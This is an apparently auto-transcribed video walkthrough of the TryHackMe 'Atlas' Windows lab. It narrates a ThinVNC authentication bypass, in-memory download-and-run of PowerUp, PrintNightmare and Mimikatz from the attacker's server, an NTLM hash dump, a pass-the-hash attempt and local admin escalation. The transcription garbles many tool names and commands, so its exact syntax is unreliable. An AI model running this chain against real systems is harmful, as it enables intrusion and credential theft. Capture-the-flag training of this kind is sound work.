So welcome back. Today we're going to be looking at Atlas. It's a Windows machine on TryHackMe. I already started the machine. I'm going to copy that. It's been running for about 4 minutes now. Let's go ahead and do an mmap scan. Start off with that, right? So TAC for all boards. TAC VV, very verbose. Time to 4, 1 above the default. TAC-N, no DNS lookup. TAC-PN, do not ping. So far we come back with port 8080 3389. So most likely remote desktop's most likely on. And we will start to look at that remote desktop and that port 8080. Those will be the first things that we look at here. So let's go ahead and do an mmap TAC or TAC-P8080. And that IP address right. Let's go ahead and also check that port out. 8080. Most likely the web server. We get username and password admin.
That's not a very secure password.
Well, that's what it was in the Wi-Fi pucks that we got into to change all the names. It was admin. So, alright, so nope, let's try admin password. Nope, okay. So, yes I am, once I'm done with my canteen, I was going to. Or tonight, one of them two. But, yeah, well. Alright, so, we're not getting anywhere with that. Just going to see what this guy is. Just going to see if we can intercept this request actually, and see if we can do something with it. Let's start up Burp Suite. And let's get a little, let's stop this over here. And let's get a proxy going and see if we can get anything with this. I'm just going to start Burp. Alright, and I'll try to log it again. Or maybe just refresh the page. See if that gets intercepted at all. It does get it. We got proxy, okay. Boom, boom. We don't know, okay. Let's try to set something at it, like admin. Going forward. Get WPAD. Okay. That's something. Sign in with admin. So we have digest username admin real thin VNC. That might tell us something like right there. And then base 64. Is this base 64 of admin like right there? What is that? Response. I don't see password here anywhere. Is that base 64 of admin? Let's try to echo that. Okay, maybe it's not base 64, is it? Because that slash like right there. I don't know what that is like right there. We can always try CyberChef. Okay, so we got VNC. Let's try CyberChef real quick. See if it knows what this is, or if this is anything at all, or if it actually does something like this. We just need to delete that part out. How does it do that? Do we get output? No, it's definitely not base 64 like right here. Now I think about it. Alright, yeah, because I do 2 base 64. Yeah. Okay. Let's go ahead and okay. So we had what was it called again? It was called thin VNC. Let's go into a search exploit for thin VNC. See what we come back up with? Okay, authentication bypass. I don't know what version we're working with here, but I mean, it's the only thing that we got going for us so far. So let's try this. So let's do a search exploit, TAC-N, thin VNC, cat that, and see what it needs. So this is authentication bypass here. So URL plus host port XYZ /thin VNC.ini. So obviously we need something like it would be Python, that guy, for the IP address, right? Yeah, the IP address, we also have 7680, we check out what that is. Then the port, 8080. And what do we get here? We get Python 3. What's it telling us here? That's the next out of range. let's go for the arguments, right? Need arguments, correct? Port is argument 2, host is argument 1, exploit host port. Okay. Let's go ahead and check out that 7680 like real quick. 7680. Now let's also see if there's anything in Metasploit, I guess. Do not ping. Okay, so now it's supposedly filtered. Let's go ahead and search for thin VNC. Okay, we have our auxiliary scanner. So it looks like directory traversal. Let's go ahead and try U0. Show options. Set our R host to P over here, right? I'm going to run that. Okay, found credentials Atlas and hold up the heavens. Okay, so I was able to find it. This one was not, but shows like we're just doing some type of directory traversal there for it, huh? So I wonder if we could just curl, like, was it curl 8080. I don't know how far back we go or whatever else. This guy only goes back a couple times, doesn't he? Can't find it anymore. There we go. Then vnc.ini. Okay. But he found Atlas hold up the heavens. So we found something here, right? Let's go ahead and utilize that for our web server over here. So stop, refresh. Oh. And we had what was the IP address? 10.10.164.160, 10.10.164.160, 8080, Atlas. Was Atlas capitalized in there? It was, yes. The A is capitalized. And there we go. There's that, right? Don't save. Okay, so then we have machine. Is this like a command prompt or something like that? Like what is what's this? So at least we got into there so far. This is like some type of weird like. What the heck? Typed in who am I? Did I just get in this machine? Looks like we have some type of like VNC thing going here, doesn't it? That's super weird. Like the mouse like doesn't work. Like once you're there, like the mouse like doesn't work. That doesn't work. Okay. Keyboard. Control. Oh, okay. This is strange. I never did anything like this before. This is very strange. Okay. So, does that mean that remote desktop will work with Atlas also? Is this like VNC? I'm wondering. But VNC wasn't open over here. Unless it's on 7680. That was the only IP address I found, right? Oh. Okay, so we're in the domain controller. I wonder who we're running as. And if we can get in there more easily with like VNC viewer for 10.10.164.160. That's what it looks like over there is VNC. I wonder if Atlas will work. I wonder if that's like the username and password. Like a username and password? That's like RDP into this. I go to Remina. 10.10.164.160. GAI, okay, yes. Minimize that guy down. See, it's open Pando Pub, okay. Atlas. Hold up the heavens, guys, do that. Okay, it looks like that got me here. Okay, so we're getting somewhere now. I'm going to try to do scale mode. Okay, so what is this? Refresh complete one or more warnings. Okay, can we add, like, what permissions do I have on here? Who am I? Command. Who am I? We're Atlas. I wonder what permissions. I wonder if I can like add a user or make it like an administrator or something like that. You know what I'm saying? If I go like tools, I need to actually see this whole thing. Tools. Different. Manage. Add roles and features. View. 75%. Where is... Okay, so I can't add a user, it looks like. Okay, that's okay. Can we go to PowerShell? There we go, okay. Can we do a power up? PS1 or something like that? Can we do something like that? Let's try to do, let's get a web server running. Let's go to locate power up.ps1. Let's go ahead and copy that over in here, right? Let's go ahead and do a copy over into here, and then from here we'll do a Python 3 tech-m HTTP test server config 10.13.26.184. So let's go ahead and try that. So let's go ahead and do a IEX IWR 10.13.26.184 slash powerup.ps1. Okay. Invoke all checks. Okay, so tab definitely works. It's going to take a second because I hit tab. So I'm used to doing that now. Let's go ahead and look at the what we're supposed to be doing also. Well, we do that too. What do you want us to do? Start the machine. We did that actually. Port scanning. We did that also. But the mmap port. Submit the answer. So we had 8080 and 3389. Right, from low to high. 3389, 8080. What service does mmap think is running on the higher of the two ports? Thin VNC. Or was it not that? I don't know. I don't remember. That's just what service is actually running. But I think I did do an mmap scan on that, didn't I? So just TACP 8080. I don't know where the heck it went, so we're just going to run another one. So let's go ahead and do a nmap TACP 8080 TACSV TACSV on the IP address of I don't even know what. There we go. And TACPN. All right. Enumeration, service enumeration. We found thin VNC. Search plate one didn't really help us out very much, but we did find it. Okay. He used curl to find it. Foothold. We have a foothold. This looks a little bit different than ours now, doesn't it? Okay, Okay, cool. So yeah, we actually, that one wouldn't have worked. So we were correct, I think, in using what is it? Metasploit. We did a little bit differently than they wanted us to do it, but that one was not too bad. And we found with, we also didn't find it with curl. We found it with burst suite. So we did get into it. Okay. Privilege escalation. We are here. Right. So we didn't invoke all checks. See what we got here. Okay. We found some clear text username and passwords. That's not really going to help us out now. We'll clear text name. That's not going to help us out. This guy right here, most likely we can't run him because he most likely has to be ran by an administrator. We could try it though. So let's go ahead and copy him. So we're going to copy this whole thing right here. Control V. Should look like that. Command we'll say is going to be net user / add John. Now it wrote that. Okay, the bat launcher, I can't even see it, but it writes that file into a bat launcher. You can then move that to the desktop and then launch that bat file. The only thing is though, okay, never mind. I was written to bat launcher written to here. Bat at 64. So we can go ahead and try to grab that if we want to, and then copy that guy onto the desktop. Because it does not exist. Probably because it's just .bat. It's probably not bat x64. That's probably why. Okay. Then if we go into the desktop, we can see there's going to be a debug. So, but the only problem is we most likely cannot run that. Let's see, system file error has occurred. Access denied. Yeah, we're not going to be able to run that guy like right there. So if I go to net user, John should not exist. He doesn't. Okay, so now we need to figure out another way. Alright. So who am I? /priv. Check this out again. Bypass transfers checking. Alright, let's go ahead and power up. Didn't want to show us anything. Let's try a little let's see here. Locate WinPeas. So we need to grab winpeas.bat. Let's go ahead and locate that. Now let's go ahead and copy that over, right? Copy that over in here. And let's create that Python server again. This time we'll do a wget. HTTP 10.13.26.184 /winpeas.bat. The out file, we'll make it winpeas.bat. Alright, there we go. So we got that winpeas.bat now, correct? So let's go ahead and run that. That's 100% not winpeas.bat. Winpeas.bat. And we'll start reading out this guy. Oh. Okay, never mind. That's showing us what they look like. Jesus. History.txt, huh? Might be able to look in that, like right there. I wonder if it's just my history, though, what I've done so far. We can try looking at that. Alright. So, we have server's binary permissions. C program analyzes light agent and he serves binary permissions with WIC and I. Trusted installer. Unquoted service path. Check and modify service registries. Wonder which version of Windows this is. Okay. Oh boy. There we go. Alright, let's go ahead and also look at what the this thing actually wants to do. Windows exploration math topic is completely great. It's completely blah. No service designs mechanism activated. At this point, we would usually start to enumerate target. For this would potentially lateral movement opportunities in an active direct environment. Wind, peas, and seatbelt are prime examples of tools that we may wish to employ here. However, there are many other tools available. Manual enumeration is always a wise idea. What is daunting? There are hundreds of different vectors to consider. To keep this room simple, we will instead look at a set of exploits and a print spooler service which are unpatched at the time of writing. Print spooler is notorious for privilege escalation vulnerabilities. It runs with print nightmare. Yeah, I thought for print spooler service though. Oh, never mind, that's a different one. Okay, so I guess he wants us to use print nightmare. So I think that's on Kali, I believe. Let's go ahead and try to locate print. Maybe it's just print spoofer, I think, for us. Alright, is that what it's going to be? Yeah, we actually want this one right here. Never mind, we want that guy right there. That's a good point. So let's go ahead and functions invoke nightmare. Okay. Driver name is toy, not malicious. Okay, let's go ahead and wget that. I should put that in my back of my home directory. Okay, let's go ahead and move CVE him to print nightmare. .ps1. Now let's go ahead and copy our CD back into desktop. Try Acme Atlas. And we'll go ahead and copy print nightmare .ps1 to right here. And we'll go ahead and upload that now, right? So let's go ahead and do a... I wonder if I can do an IEX IWR for this guy. Probably, I don't see why not. So IEX IWR HTTP 10. I have to get my OMP address all the time. 10.13.26.24, 10.13.20, 13.26.184 / print nightmare .ps1. Okay, now let's go ahead and just do a it was invoke print nightmare, is that correct? So invoke nightmare, okay. So invoke nightmare. Okay, so now he's the local administrator? I like that. No. Atlas is not in the local administrator like right now. Okay. So that did not work. Start your RDP session, open a new PowerShell prompt. Invoke nightmare, boom, boom. Yeah, those payload message create a new user called. Okay, so actually created a new user. Added user as, what does it say created? Oh, that's the very first thing it did was create a new user. Never mind. My fault. I didn't even read. Maybe I should read the whole thing. Using default, I was wondering why there was an admin with an I, one in it instead of an I. So we created a new user, right? Admin with password p@ssw0rd. So let's go ahead and log in him, right? Couldn't we just do a little log out and log in? See if he's if he's administrator, he should have RDP permissions, right? So 10.10.164.160 ADM1N p@ssw0rd. Now this guy should be get requested to get kicked off. This guy should be coming on, right? No, because I didn't log in with the same person, huh? So okay, cool. And he is part of administrators. So if we go back over to our this guy right here, right? Administrator, net local group administrators, ADM1N is part of it. So now what we should be able to do is minimize him. Let's get back into this one. Let's go ahead and exit out of that one, like right there. We'll go to command prompt, right? And let's keep going at this machine, right? So let's go to command prompt. If it feels like opening today. Actually, no, that's remote desktop. Right click, more, run as administrator. See if we actually can do that, if we are an actual administrator here. Okay, yes we can, and there we go. Okay, so now we ran as administrator. Let's go ahead and get Mimikatz over in here, as usual. So we'll go ahead and locate Mimikatz. What? Okay, there we go. Invoke Mimikatz. We'll copy that over in here. All right, let's go ahead and get that Python server back up and running. And let's go ahead and do an IEX, IWR. Let's see if he decides to type. Come on now, you can do it. Another break or something? What happened here? Okay. No, it didn't break. Right click. Run as administrator. Yes. IEX. IWR. You just... don't want to do it like right now? What's going on here? Okay, let's disconnect and connect back into it. How about that? What was it? 10.10 10.10.164.160 ADM1N PASSWRD. If we're far enough along, we get rid of that. Alright. Okay, there we go. We're typing at least now. We've got somewhere, right? Cool. Okay, so now let's go ahead and do a IEX IWR 10.13.26.184 / invoke Mimikatz. PS1. Let's try that like right there. Did I do it to myself? Oh, probably it's all lowercase. So I'm used to doing it uppercase. My laptop's all uppercase, so I've been doing a lot of this stuff at work lately. With my laptops off the network, with my own little network, stuff like that. That did not seem like the Mimikatz I wanted, though. The one I want's a lot bigger, I feel like. I don't know why I did with the .ps1. That's not going to work right there. Please stop trying. Okay. Invoke Mimikatz. Yeah, that's exactly what I thought was going to happen. Let's go ahead and look up invoke Mimikatz PS1. Let's see what the other one, how big the other file is. See how big this one is. Same size. The one that I want's like 3,000 something. Invoke Mimikatz PS1. Power exploit. Do raw, and we'll do a wget for it. Let's see how big this one is. wget. Same size, isn't it? Pretty close to it. That may not be the one that I want either, but we're going to go ahead and try it anyways. There's one that's like 3,000 or something like that. And that one always seems to work. The other ones seem to always give me some type of problem. You're right, because that server isn't up and running. I should just keep the server up. Yeah, that's not it. Okay. See about this one. Okay. Oh, there's one here that does work. Well, that's not very helpful, but is this guy it? You know what? Look where else I might have one too. There's actually in my home directory here. I might have one, so I'll just go look in there like real quick. Yeah, this one's actually bigger. So can I copy him? And let's paste him in the Kali links here. Is that allowed? Just want to go to the desktop. Okay, let's try to use let's see, I know I got something in here. There we go. Boom. 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 Invoke Mimikatz. .ps1. You notice how this one's 3.7? These ones are 2.2. That's what I was talking about. I'll say that. Right click. Copy. Sure, we can open it up with a text editor, sure. And we'll save it to myself. That's going to take a minute, it looks like. I thought I'd mwahaha, but no, I did not mwahaha. Properties. Okay, let's go ahead and CD into there, I guess. Like slash media. There. So. Okay. There. All right. Now we should be able to just, I want to be able to do everything with that. Can I just do a 777? I don't understand why I can't. Okay. There we go. Okay, cool. Got it. And now we can go ahead and get that Python server back up and running. Now let's go ahead and go back over here and do our IEX, IWR. Actually, there we go. And you notice that this guy will get a lot bigger up here. And then we'll do an invoke Mimikatz. Told you I like that one better. You notice we are administrator, so invoke Mimikatz should work just fine. It should have its privilege debug 20 if you're doing like mimikatz.exe, or if you're just doing it that way. We're doing it this way so we can run it while in memory. Do I even need to do all this? What am I doing? Are we still on this box? Are we still doing this box? Are we doing something with this box? Could have sworn something about post-exploitation in the beginning, whenever I read down the different things. Okay, so that means you're running as administrator, full access. Yes, we are running administrator now. I know that much. We just came in as admin. We didn't do all that, but you know, we just logged in as admin. We could also do a. All he's doing like right here, he's just starting up command.exe, running it as admin with a one. We just remote desktop in as admin. Attack, post-exploitation. Yes, we do have to do Mimikatz. Let's say, I swear I know I saw Mimikatz. Now he's doing .exe. We are doing PS1. Privilege exploitation, we did that. We crushed that problem. Right there. Okay, and then post-exploitation, he's using Mimikatz.exe. We used the PowerShell version and kept it in memory so it's not hitting disk, right? So now let's go ahead and see if we can get anybody here. There's admin. What about administrator? That's what I really want. Administrator not on here? Okay, let's go ahead and look up okay, so we got Mimikatz, right? Boom, boom. Mimikatz did its little thing, right? Boom, boom, boom. Let's do an LSA dump. So let's do a invoke. Can I see admin anywhere on this? We'll do an invoke Mimikatz cat command. LSA dump. LSA / patch. Let's try that like right there. Yeah, what is the administrator's account NTLM password hash? So he did LSA dump Sam. That's the one that he did. So we'll try that one also. Get it from the memory. There's Atlas's hash. Admin. So still waiting on the administrator hash, huh? Doing stuff a little bit different than the walkthrough had, but that's always good. So then you guys follow the walkthrough, come back through and follow this. Do it 2 different ways, you know. That's always good. More ways the better, right? So there's Atlas, there's the administrator like right there. So another way to be able to get his hash like right there, okay? So there we are. Submit. Conclusion, final thoughts. I hacked Atlas. Yes, we did. Alright, now let's also do a little, if we were on a computer and we wanted to try to pass the hash, right? So we could do a invoke Mimikatz cat command. This won't work because we're not actually going to a domain or whatever. So we'll do this. SDK URLSA. Pass the hash right for /user. It's going to be administrator. Administrator /NTLM. It's going to be our hash that we just found. Say /domain, which we don't know what the domain is. So we may want to figure that out first, huh? So let's go ahead and do a host name. I'll go with that GAIA. So we'll do our invoke mimikatz again. Attack command. URL say. Pass the hash. /user is going to be administrator. /domain. It's going to be that. /NTLM will be the administrator, right? NTLM hash /run is going to be PowerShell.exe. Now domain is probably going to be like gaia.local or something like that, but we could also look up domain, see what domain we're actually on. Right? I don't think we're actually even on domain like right now because we decide to come over to this guy. So I don't know if we're even on domain like right now because we're on the local user account, right? So that's one thing we have to realize. We still try this, see if it runs PowerShell. This would be something you do on domain if you were to get local admin privileges, do this on domain, and then pass this off, and then try to pass the hash across the network in the new PowerShell that you have. When you open up that new PowerShell, you still will be the same user that you are, but then whenever you do like a new PS session, you'll be able to connect to somebody else. I show that a lot in the hacking with PowerShell videos that I have. I show this quite a few times. We do this, so I'm just kind of having fun now. Alright, well that opened up. What is this guy saying over here? Saying, hey, domain don't actually exist. Error mimikatz, do local commands there, module not found, mimikatz. Alright, so we can do a who am I guess. Okay, we are him still, obviously. I shouldn't be able to do a sesh. I'd be very, very, very surprised if I could. Yeah, I think so. Okay. Alright, access denied. It's probably also because I'm not actually on the actual system itself, huh? But since I am, can I do a net user atlas? Net local group, excuse me. Net local group. The domain atlas. Let's do net local group administrators, right? /add. Net local group administrators. Atlas is now an administrator. So can I log back into Atlas now? So let's sign out. Let's log back into Atlas with the credentials that I did not save. Okay, cool. They're stuck right here. I'll say whoops. 10.10.164.160. Because we just made him an administrator now, Atlas, right? And the credentials were hold up the heavens. And we should be an administrator now over here with Atlas. Exit out of here, exit out of there, exit out of everything. Let's go to command prompt. right click, run as administrator, and we shouldn't get a prompt. Okay, so we do get a prompt. To enter an admin user password, more choices. Can I do Atlas? Atlas. Password. It's going to be the heaven one, right? It's really awkward this works. Okay, so I need to actually type it in. 0LDUP the HESIVENS. Okay. So we are now administrator over here, right? Now, can we do a session? I'll see why we shouldn't be able to, but let's try it. Okay, no we cannot. Alright, so we cannot make a session. That could be, I mean, it may just not be allowed, you know. It may just not even work with this guy. Does he have WinRM up though? If he doesn't have WinRM up, then we can't make a session no matter what. 10.10.164.160, right? We're just going to say it's Atlas. Password, we're going to go ahead and put in this password. And we'll see if this works over here. If so, we can actually become the administrator with the administrator hash. Like right there. We always try to crack it too. The administrator hash, we always do something like that also. He's still not opening up, so I'm going to go with WinRM is probably not even here. If WinRM is not here, then I don't believe you can do a PS session. So that's going to be it for this video. Alright. At least you guys got to see how to make a user with net local group administrators administrator. Because we made Atlas an administrator there. And yeah, that's going to be about it. Hopefully you guys enjoyed it. I know I learned a little bit doing this one. I had fun doing it. So that's what really matters. And that is going to be it for me. You guys have a good night.